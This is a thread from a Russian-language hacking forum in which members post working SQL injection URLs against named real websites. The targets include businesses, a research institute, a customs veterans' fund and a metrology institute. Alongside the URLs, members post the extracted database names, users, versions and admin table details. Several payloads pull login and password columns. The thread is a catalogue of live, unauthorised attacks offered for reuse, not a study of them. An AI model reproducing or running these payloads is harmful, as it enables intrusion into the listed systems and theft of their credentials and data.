SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    -----------
    Code:
    http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
    http://www.wrboats.ru/catalog.php?id=-5+union+select+1,concat_ws(0x3a,id,user,login,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--
    
    database - [a2748_wrboats]
    version - [5.0.75-percona-highperf-b11-log]
    user - [[email protected]]
    -----------
     
    3 people like this.
  2. lalala23

    lalala23 New Member

    Joined:
    14 Mar 2009
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    belindust_firm:5.0.26-log:belindust_firm@localhost
     
    2 people like this.
  3. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    ecotextile.com PR-5

    Code:
    http://www.ecotextile.com/news_details.php?id=-10029+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4+--+
    Code:
    mow01_oldadm@localhost:4.1.22-standard:mow01_oldetn
    Таблица admin, колонки user_name, password
    Админки не нашел(
     
    2 people like this.
  4. sos17

    sos17 New Member

    Joined:
    17 Oct 2009
    Messages:
    7
    Likes Received:
    3
    Reputations:
    1
    http://www.exposicaodeartesanato.com.br/detalhe_produto.php?id_produto=-1+union+all+select+1,2,3,4,5,6,7,8,concat_ws(char(58,58),user(),database(),version()),10,11,12,13,14,15,16,17,18,19--

    expos_sirius@localhost::expos_exposicao::4.1.22-standard
     
    2 people like this.
  5. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Российский союз промышленников и предпринимателей.
    тИЦ: 1400
    PR: 6


    Code:
    Microsoft SQL Server  2000 - 8.00.2055 (Intel X86) 
    Dec 16 2008 19:46:53 
    Copyright (c) 1988-2003 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    Федеральное государственное учреждение «Научно исследовательский институт — Республиканский исследовательский научно-консультационный центр экспертизы»
    тИЦ: 1700
    PR: 5


    Code:
    VAK:php@localhost:5.0.32-Debian_7etch11-log
     
    5 people like this.
  6. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://www.[COLOR=DarkOrange]redorange.de[/COLOR]/public/php/showreel_detail.php?id=116+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--  
    Database Version: 5.0.32-Debian_7etch5-log
    Database name: usr_web190_1
    User name: web190@localhost
     
    1 person likes this.
  7. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Code:
    http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
    Версия:
    Code:
    http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--
    Таблицы:
    Code:
    http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--
    Колонки:
    Code:
    http://www.podlupom.com/index.php?id=-1 UNION ALL SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns--
    Code:
    http://www.podlupom.com/index.php?id=-1UNION ALL SELECT 1,2,3,4,schema_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.schemata--
     
    1 person likes this.
  8. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    Microsoft JET Database Engine:

     
    4 people like this.
  9. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Система комплексного раскрытия информации
    тИЦ: 2700
    PR: 6

    Code:
    Microsoft SQL Server 2005 - 9.00.3077.00 (X64) Dec 17 2008 20:40:08 Copyright (c) 1988-2005 
    Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    4 people like this.
  10. E-AL

    E-AL Elder - Старейшина

    Joined:
    3 Oct 2007
    Messages:
    36
    Likes Received:
    22
    Reputations:
    0
    Code:
    http://glinka-capella.ru/news/?id=-1+union+select+1,2,3,concat_ws(0x3a,concat_ws(0x3a,user(),version()),database()),5,6+--+
    ТИЦ: 230
    PR: 4

    User: h_glinka_capella@localhost
    Version: 5.0.70-debug-log
    Name: glinka_capella_ru
     
    2 people like this.
  11. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    mhs.ox.ac.uk pr7, v5
     
    3 people like this.
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    User: p5547pla_admin@localhost
    Database: p5547pla_planetperplex
    Version:81-community
     
    4 people like this.
  13. s0l_ir0n

    s0l_ir0n Active Member

    Joined:
    14 Mar 2009
    Messages:
    399
    Likes Received:
    144
    Reputations:
    18
    Сайт какой-то фирмы:
    Риэлторы в Севастополе:
    Агрокультуры резюме(с прикольным фильтром):
    Французики:
    Metropolitan Market
    Книжный магазин:
    Немцы:
    Хомяк какого-то чела:
    Японцы:
    Такой же японский двиг:
    То же самое без фильтра:
    Танц клуб:
     
    #10933 s0l_ir0n, 21 Oct 2009
    Last edited: 21 Oct 2009
    6 people like this.
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    User: [email protected]
    Database: freemp3_slovo
    Version: 4.1.22-log
     
    3 people like this.
  15. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    Sivanandabahamas.org pr4
    Sivananda Bahamas Yoga Retreat. )
    Code:
    [COLOR=SlateGray]http://www.sivanandabahamas.org/index.php?page_id=null+union+select+conc  at_ws(char(32,124,32),version(),user(),database(),@@version_compile_os)+--+[/COLOR]
    5.0.27-log | my_yoga_net@localhost | my_yoga_net | redhat-linux-gnu
     
    6 people like this.
  16. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Фонд социальной поддержки сотрудников и ветеранов таможенной службы (Фонд С.В.Т.С.).
    Code:
    svts:root@localhost:5.0.45

    Белорусский Государственный Институт Метрологии.
    Code:
    belgimby:belgim@localhost:5.1.39
     
    3 people like this.
  17. diman94x

    diman94x New Member

    Joined:
    11 Jun 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    0
    Server = Apache/2.0.54 (Fedora)
    Version = 5.0.79
    Powered by = PHP/5.2.8
    Attack Type = SQL Union Injection
    Current User = lactuel@localhost
    Current Database = lactuel
    Supports Union = yes
    Union Columns = 19
    Url| http://www.lactuel.be/index.php?catId=-106
    Vuln: http://www.lactuel.be/index.php?catId=-106+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
     
    1 person likes this.
  18. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    Офф сайт художницы Джулии Гилмор pr-3
    Code:
    http://www.juliagilmore.ca/gallery.php?pageid=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13---
    andreakr_julia@localhost
    5.0.81-community-log
    andreakr_julia
     
    5 people like this.
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Shop какой то.
    User: root@localhost
    Database: whitestripe3
    Version: 4.1.22-standard
     
    1 person likes this.
  20. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    http://www.ssprava.org/index.php?id=-3+union+select+version%28%29,2
     
    #10940 DeluxeS, 22 Oct 2009
    Last edited by a moderator: 22 Oct 2009
    2 people like this.
Thread Status:
Not open for further replies.